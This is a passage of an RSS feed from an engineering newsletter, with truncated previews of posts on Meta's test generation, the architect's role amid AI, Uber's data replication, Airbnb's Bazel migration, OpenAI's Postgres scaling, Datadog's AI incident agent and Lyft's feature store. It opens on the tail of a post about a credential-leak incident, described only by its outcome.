exposed one stayed active. They caught the error on February 11 and re-rotated&#8212;but the attacker had already exfiltrated the credentials, and the npm token remained valid long enough to publish six days later.</p><p>A separate, unknown actor had found Khan&#8217;s proof-of-concept on his test repository and weaponised it.</p><div><hr></div><h2>Why None of Your Existing Controls Would Have Caught This</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-a-github-issue-title-installed">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Meta Used LLMs to Build Tests That Are Supposed to Fail]]></title><description><![CDATA[The tests that were built to fail]]></description><link>https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 24 Feb 2026 16:52:49 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!MX8E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffef15fcc-97a4-48bc-a537-15a357fe3fbc_1200x600.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>TLDR</strong></h2><p>Most test generation tries to make tests pass. Meta built a system where the whole point is to make them fail, on the code change you&#8217;re about to land, before it lands. Out of 41 engineer reach-o&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/metas-tests-are-supposed-to-fail">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Architect Is Not Being Replaced. The Architect Is Being Redefined.]]></title><description><![CDATA[And if you don't notice the difference, you'll end up on the wrong side of it.]]></description><link>https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 17 Feb 2026 09:35:43 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5516b99e-3589-47cd-822c-e4518897adfc_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h3><strong>TLDR</strong></h3><p><a href="https://www.cnbc.com/2025/05/14/klarna-ceo-says-ai-helped-company-shrink-workforce-by-40percent.html">Klarna went from 7,400 to 3,000 employees</a> and called it AI. Then <a href="https://mlq.ai/news/klarna-ceo-admits-aggressive-ai-job-cuts-went-too-far-starts-hiring-again-after-us-ipo/">quietly started rehiring</a>. Google&#8217;s engineers now review more than <a href="https://clouddon.ai/will-ai-agents-replace-humans-in-software-developer-jobs-beyond-assistance-to-replacement-eedde4ae7c04">30% AI-written code</a>. <a href="https://blog.tmcnet.com/blog/rich-tehrani/ai/how-uber-built-ai-agents-that-saved-21000-developer-hours.html">Uber&#8217;s AI agents saved 21,000 developer hours</a> &#8212; using a LangGraph-based system they call &#8220;Validator.&#8221; <a href="https://spectrum.ieee.org/ai-effect-entry-level-jobs">Entry-level programmer employment in the US fell 27.5%</a> between 2023 and 2025.</p><p>The junior engineer is already being displaced. The mid-level engineer is next.</p><p>But the software architect? That role isn&#8217;t shrinking. It&#8217;s becoming the most important job in the building. The question is whether architects understand what it now actually requires.</p><div><hr></div><p><strong>The AI-replaces-engineers narrative is mostly wrong and also not entirely wrong. The nuance is where it gets interesting.</strong></p><p>Klarna is the most cited example. In 2024, the company&#8217;s OpenAI-powered chatbot handled 2.3 million customer conversations in its first month. By late 2024, <a href="https://www.cnbc.com/2025/05/14/klarna-ceo-says-ai-helped-company-shrink-workforce-by-40percent.html">their headcount was down 40% from peak</a>. CEO Sebastian Siemiatkowski went on CNBC and said the quiet part out loud: AI did this. Then, in 2025, <a href="https://mlq.ai/news/klarna-ceo-admits-aggressive-ai-job-cuts-went-too-far-starts-hiring-again-after-us-ipo/">he quietly started rehiring</a>. &#8220;We went too far,&#8221; he admitted. Customer satisfaction had cratered. The AI couldn&#8217;t handle nuance, empathy, or edge cases. The humans they&#8217;d shed were carrying context the model couldn&#8217;t learn from a training set.</p><p>The Klarna story isn&#8217;t a win for the pro-AI camp or the anti-AI camp. It&#8217;s a case study in where the boundary actually is right now. Structured, repetitive, high-volume interactions? AI wins. Unstructured, novel, high-stakes decisions that require organizational and human context? Humans still win. Not comfortably. Not permanently. But for now, yes.</p><p>Software architecture sits at exactly that boundary. And that&#8217;s why the next few years will either be the best time in history to be a senior architect &#8212; or the last generation of architects who learned the craft before AI ate the curriculum.</p><div><hr></div><h2>What Uber Actually Proved</h2><p>The most concrete AI-augmentation-in-engineering story from the last 12 months isn&#8217;t from an AI company. It&#8217;s from Uber.</p><p><a href="https://blog.langchain.com/top-5-langgraph-agents-in-production-2024/">Uber&#8217;s Developer Platform team</a> built an internal AI agent called Validator using <a href="https://medium.com/@hieutrantrung.it/the-ai-agent-framework-landscape-in-2025-what-changed-and-what-matters-3cd9b07ef2c3">LangGraph</a>, the graph-based orchestration framework that reached general availability in May 2025. Validator doesn&#8217;t make product decisions. It doesn&#8217;t design services. It catches bad code before it ships &#8212; running linting, checking build validity, surfacing test design issues, doing the kind of thankless hygiene work that junior engineers traditionally owned.</p><p>Then they built Autocover on top of it. Same architecture. Autocover generates test cases automatically using domain-specific expert agents. Engineers trigger it from inside their IDE. It streams context-aware tests in real time. For large files, the system executes up to 100 tests concurrently.</p><p>Result: 10% increase in test coverage across the Developer Platform. <a href="https://blog.tmcnet.com/blog/rich-tehrani/ai/how-uber-built-ai-agents-that-saved-21000-developer-hours.html">21,000 developer hours saved</a>.</p><p>That&#8217;s not a small number. That&#8217;s equivalent to roughly 10 full-time engineers doing a year of grunt work, automated.</p><p>But here&#8217;s the part that didn&#8217;t make the headline: Uber found that deterministic agents &#8212; rule-based, hand-coded logic &#8212; outperformed LLMs for tasks like linting and build execution. The LLM wasn&#8217;t the hero of every scene. The architecture was. Someone at Uber had to decide what gets an LLM node, what gets a deterministic function node, and how the graph flows between them. That person is an architect.</p><div><hr></div><h2>The Real Job Description Is Changing</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-architect-is-not-being-replaced">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Inside Uber’s 350PB Data Lake: The Distcp Rewrite That 5x’d Performance]]></title><description><![CDATA[How Uber scaled data replication from 250TB to 1PB per day by optimizing Apache Distcp, cutting latency 90%, 5x&#8217;ing capacity, and migrating 306PB to cloud.]]></description><link>https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Wed, 11 Feb 2026 20:46:19 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/8ead3563-41f5-4a1f-90ac-9b06292fc74b_1536x1003.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2><strong>TLDR</strong></h2><p>250 TB to 1 PB per day. One quarter. Daily replication jobs jumped from 10,000 to 374,000. Uber&#8217;s data lake hit 350 PB and their copy tool couldn&#8217;t keep up. The P100 SLA of 4 hours became a joke.&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-uber-moved-1-petabyte-a-day-and">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Knowing When to Stop Engineering: Airbnb’s Hardest Lesson]]></title><description><![CDATA[Tens of millions of lines of code. 700 services. 450 data pipelines. 4.5 years of migration. And the thing that could have cut the timeline in half was knowing when to stop engineering.]]></description><link>https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sun, 01 Feb 2026 07:36:29 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f726df75-963c-4fcf-bfbb-56345903a563_1120x629.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>5x faster local builds. 3x faster IntelliJ syncs. 3x faster deploys to dev. Build satisfaction jumping from 38% to 68%.</p><p>Those are the numbers. They&#8217;re impressive. And it took Airbnb 4.5 years to get there.</p><p>With hindsight, they could have gotten there a lot sooner. Not by being smarter about Bazel. By being smarter about <em>when</em> to optimize.</p><p>Let&#8217;s get into it.</p><div><hr></div><h2>&#128680; Why Gradle Was Killing Them</h2><p>Gradle&#8217;s single-threaded configuration was a ticking clock. Large projects took minutes just to <em>configure</em> before a single line of code compiled. On CI, they were already vertically scaling to the biggest machines AWS offered. The sharding heuristics they built to split work across machines were leaking efficiency everywhere, machines sat half-idle while shared tasks duplicated across nodes.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_xQ_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 424w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 848w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1272w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp" width="1120" height="598" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:598,&quot;width&quot;:1120,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:56936,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/186479620?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_xQ_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 424w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 848w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1272w, https://substackcdn.com/image/fetch/$s_!_xQ_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F558e3507-5eec-489b-8d2f-3f359cea62f9_1120x598.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But speed was only half the problem.</p><p>Gradle tasks had full access to the file system. Sounds fine until one engineer writes a cleanup task that wipes recent files in <code>/tmp/</code>. That task races with every other Gradle task using <code>/tmp/</code>. CI starts failing at scale. Thousands of tasks have to rerun. Nobody catches it until it&#8217;s already in production.</p><p>This was not a one-off. It was structural. Gradle gave tasks too much trust, and at the scale of tens of millions of lines of code, trust becomes a liability.</p><div><hr></div><h2>&#128269; What Bazel Actually Fixed</h2><p><strong>Sandboxing killed the ghost dependencies.</strong> If a file isn&#8217;t declared as an input to a build action, it doesn&#8217;t exist. Period. That <code>/tmp/</code> race condition? Can&#8217;t happen. Undeclared dependencies that work on your laptop but fail in CI? Gone.</p><p><strong>Remote execution changed the math entirely.</strong> Instead of sharding builds across a handful of machines with heuristics, Bazel fanned out to thousands of parallel actions. RBE workers are short-lived &#8212; spin up, do work, die. No machine sits idle. No duplicated shared tasks. And Build without the Bytes meant only downloading the subset of outputs you actually need, not every cached artifact.</p><p><strong>Starlark forced discipline.</strong> Bazel&#8217;s configuration language is constrained to be side-effect-free. That&#8217;s not a limitation, it&#8217;s what makes parallel analysis possible. Gradle&#8217;s configuration phase was single-threaded because it <em>couldn&#8217;t</em> be parallelized. Starlark&#8217;s constraints made it safe to be.</p><p>The results landed hard: 3&#8211;5x faster local builds, build satisfaction scores jumping from 38% to 68%, and CI times that actually made developers feel productive again.</p><div><hr></div><h2>&#127959;&#65039; How They Actually Did It (The Parts That Matter)</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/airbnb-got-5x-faster-builds-3x-faster">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[What OpenAI Understood About Postgres That Most Teams Ignore]]></title><description><![CDATA[How One Postgres Instance Powers 800 Million ChatGPT Users]]></description><link>https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 24 Jan 2026 18:57:33 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5807a0ea-a788-40f2-901a-15126a5cb6e3_960x560.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Every infrastructure architect on the planet will tell you the same thing: single-primary Postgres dies around 10 million users. Maybe 20 million if you&#8217;re really good.</p><p>OpenAI is at 800 million.</p><p>One primary database. 50 read replicas. Millions of queries per second.</p><p>And it just keeps working.</p><div><hr></div><h2>They Broke Every Rule We Have About Database Scaling</h2><p>When ChatGPT launched and traffic went vertical, the playbook said: start sharding, migrate to Cassandra, or pray.</p><p>OpenAI looked at that playbook and said &#8220;nah.&#8221;</p><p>Here&#8217;s what they noticed: 95% of their traffic is reads. Updates happen, sure. But the overwhelming majority of requests are just fetching data.</p><p>Everyone panics about Postgres not scaling. But that&#8217;s mostly about writes. Nobody&#8217;s really pushed the boundaries on reads with a single writer.</p><p>Turns out you can go way, way further than anyone thought.</p><p>One Azure Postgres instance handling all writes. Nearly 50 replicas spread across regions handling reads. Double-digit millisecond p99 latency. Five nines uptime.</p><p>In the last 12 months? One SEV-0 incident. And that was during the ImageGen launch when 100 million people signed up in a week and writes spiked 10x overnight.</p><div><hr></div><h2>Write Traffic Is Where Postgres Falls Apart</h2><p>Postgres uses something called MVCC. When you update a row, it doesn&#8217;t change it in place. It creates a whole new version and marks the old one as dead.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!TFRg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!TFRg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 424w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 848w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 1272w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!TFRg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png" width="1456" height="902" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:902,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:195737,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/185656210?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!TFRg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 424w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 848w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 1272w, https://substackcdn.com/image/fetch/$s_!TFRg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7937441e-f09b-4cc9-ae3a-66ebb4417d65_1578x978.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Update a user&#8217;s email? New row version. Update it again? Another new version.</p><p>All those dead versions sit there until autovacuum cleans them up. And under heavy write load:</p><ul><li><p>Every update copies the entire row (write amplification)</p></li><li><p>Reads have to scan past dead versions to find the current one (read amplification)</p></li><li><p>Tables bloat</p></li><li><p>Indexes bloat</p></li><li><p>Autovacuum can&#8217;t keep up</p></li></ul><p>This is why people say Postgres doesn&#8217;t scale. They&#8217;re hammering it with writes and hitting a ceiling.</p><p>OpenAI just stopped fighting that fight.</p><div><hr></div><h2>What They Did Instead</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-openai-scaled-postgresql-to-power">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Datadog taught an AI to investigate high-severity incidents]]></title><description><![CDATA[How Datadog built an AI SRE agent that investigates high-severity production incidents by forming hypotheses, following causal signals, and reasoning like experienced engineers&#8212;not by summarizing dashboards.]]></description><link>https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 20 Jan 2026 07:56:46 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/0a36b9d4-24dc-4578-9ca1-17d20657d7a6_2400x1025.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Most incident tools are good at <strong>collecting evidence</strong>.</p><p>They&#8217;re bad at <strong>thinking with it</strong>.</p><p>If you&#8217;ve ever been on call, you know the feeling:</p><ul><li><p>12 dashboards open</p></li><li><p>Logs screaming</p></li><li><p>Traces half-useful</p></li><li><p>And one suspicious metric you <em>can&#8217;t ignore</em></p></li></ul><p>The hard part isn&#8217;t access to data.<br>It&#8217;s deciding <strong>what to look at next</strong>.</p><p>That&#8217;s the problem Bits AI SRE is actually trying to solve.</p><div><hr></div><h2>This isn&#8217;t an AI summarizer (and that matters)</h2><p>The early wave of &#8220;AI for ops&#8221; tools made a quiet assumption:</p><blockquote><p><em>If we gather enough telemetry, the model can summarize its way to the root cause.</em></p></blockquote><p>That turns out to be wrong.</p><p>More data doesn&#8217;t make incidents clearer.<br>It makes them <strong>noisier</strong>.</p><p>Bits AI SRE does something different.<br>It investigates like a <strong>team of human SREs</strong>:</p><ul><li><p>Form a hypothesis</p></li><li><p>Pull <em>targeted</em> evidence</p></li><li><p>Validate or reject</p></li><li><p>Go deeper only when the signal earns it</p></li></ul><p>That sounds obvious.<br>It isn&#8217;t.</p><p>Most tools still dump everything into context and hope the model figures it out.</p><div><hr></div><h2>The key shift: causality over correlation</h2><p>Here&#8217;s the most important design decision in this system:</p><p><strong>The agent only looks at data that is causally related to a hypothesis.</strong></p><p>Not &#8220;everything nearby.&#8221;<br>Not &#8220;everything noisy.&#8221;<br>Not &#8220;everything interesting.&#8221;</p><p>Just:</p><blockquote><p><em>Does this explain why the alert fired?</em></p></blockquote><p>In one real incident:</p><ul><li><p>Kafka lag spiked</p></li><li><p>Commit latency spiked</p></li><li><p>Unrelated upstream errors were present</p></li></ul><p>Earlier versions of the agent saw <em>all of it</em><br>&#8230;and picked the wrong root cause.</p><p>The newer version ignored the noise and followed the causal chain:<br><strong>commit latency &#8594; consumer lag &#8594; alert</strong></p><p>That&#8217;s not an LLM trick.<br>That&#8217;s <strong>system design discipline</strong>.</p><div><hr></div><h2>Why benchmarking on real incidents is the quiet superpower</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-datadog-taught-an-ai-to-investigate">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[Processing Trillions: How Lyft's Feature Store Grew by 12%, 33% Faster, With Zero Custom DSLs]]></title><description><![CDATA[Lyft's Feature Store handles 1T+ operations daily, cut P95 latency 33%, and grew callers 25% YoY. How they built ML infrastructure engineers actually use.]]></description><link>https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/processing-trillions-how-lyfts-feature</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Mon, 12 Jan 2026 00:24:26 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/5b0ab863-338c-4ad2-80bc-4c826a0a47af_1050x700.avif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Lyft&#8217;s Feature Store serves 60+ production use cases and grew caller count by 25% last year. They cut P95 latency by a third while handling over a trillion additional R/W operations. The secret wasn&#8217;t fancy tech&#8212;it was treating ML infrastructure like a product with actual users who have better things to do than learn your system.</p><div><hr></div><h2>&#127919; The Problem Nobody Talks About</h2><p>Here&#8217;s what kills most ML platforms: the feature engineering tax.</p><p>Data scientists write a killer model. It works great in notebooks. Then they need to:</p><ul><li><p>Rewrite feature logic for production (different language, different compute)</p></li><li><p>Debug why training features don&#8217;t match serving features</p></li><li><p>Wait 3 sprints for platform team to provision infrastructure</p></li><li><p>Maintain two separate codebases that drift apart</p></li></ul><p>Six months later, the model&#8217;s still not deployed and everyone&#8217;s moved on to the next fire.</p><p>Lyft decided this was unacceptable. When you&#8217;re running a marketplace where every ML improvement directly impacts revenue, you can&#8217;t have your ML engineers stuck in infrastructure hell.</p><div><hr></div><h2>&#127959;&#65039; Architecture That Doesn&#8217;t Get In The Way</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!l6C-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!l6C-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 424w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 848w, https://substackcdn.com/image/fetch/$s_!l6C-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F55bd77ed-b0d0-43d0-8e85-91062eb883a4_1942x1462.webp 1272w, 